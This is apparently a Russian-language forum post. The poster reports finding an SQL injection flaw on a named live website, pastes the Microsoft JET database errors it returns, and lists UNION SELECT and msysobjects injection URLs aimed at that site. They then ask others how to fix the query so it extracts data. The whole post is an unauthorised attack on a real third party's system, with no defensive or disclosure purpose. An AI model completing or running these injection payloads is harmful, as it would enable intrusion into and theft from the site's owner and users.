Help!помогите!

нашел уязвимость!но не могу правельно составить запрос!

http://www.activ.kz/ru/?l=news&o=display&page=&idx=345

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression 'NEWS_ID=345';'.

/ru/_news.asp, line 260

http://www.activ.kz/ru/?l=news&o=display&page=&idx=345+union+select+1,2,3 ,4,5,6,7,8+from+news

http://www.activ.kz/ru/?l=news&o=display&page=&idx=-345+union+select+*+from+msysobjects+in+'.'

Microsoft JET Database Engine error '80004005'

The Microsoft Jet database engine cannot open the file 'c:\windows\system32\inetsrv'. It is already opened exclusively by another user, or you need permission to view its data.

/ru/_news.asp, line

Но вывести нечего не удаеться.

Поскажите, как правилбно составить запрос.